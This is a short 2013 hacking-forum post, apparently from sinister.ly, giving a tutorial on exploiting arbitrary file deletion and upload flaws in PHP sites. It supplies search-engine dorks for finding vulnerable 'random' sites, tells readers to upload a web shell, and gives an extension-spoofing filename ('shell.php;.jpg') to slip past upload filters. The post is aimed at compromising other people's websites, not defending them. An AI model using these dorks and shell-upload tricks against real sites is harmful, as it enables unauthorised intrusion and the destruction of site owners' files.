The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.
Twelve Years of Service
Posts: 22
Threads: 5
Arbitrary file deletion and upload 01-25-2013, 07:12 PM
#1
Arbitrary file delete and upload
I will write a little tutorial about arbitrary file deleteing and uploading
Ok let's start with what are those arbitrary files, well those files give you right to modify anything on the system. You can find this vulnerability in sites without. It's really hard ti find those vulnerabilities in targeted site but you can still use it on some randoms.
Arbitrary file delete
Spoiler:
This is file that give you rights to delete any file on the web site. Here are dorks to find vulnerable sites:
Code:
inurl:"delete.php?file=" ext:php
Now let's say you have found a vulnerable website website at the end of URL you should see something like ../delete.php?file=
boom
Arbitrary file upload
Spoiler:
Basicly this is uploading a file( you should upload shell to hack it =D ) on the server by using arbitrary file
Ok first here are some dorks to find vulnerable site:
Code:
inurl:"upload.php?file=" ext:php
Now you should see upload form, first try to upload you shell but if faild then try with extension spoofing, here are some spoof:
Code:
shell.php;.jpg
Those are the only spoofed extensions I find in internet if anybody know more to post them
•
Messages In This Thread
Arbitrary file deletion and upload - by Synchro - 01-25-2013, 07:12 PM
Users browsing this thread: 1 Guest(s)
![[Image: scaled.php?server=515&filename=antagonis...res=medium]](http://desmond.imageshack.us/Himg515/scaled.php?server=515&filename=antagonism.jpg&res=medium)
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)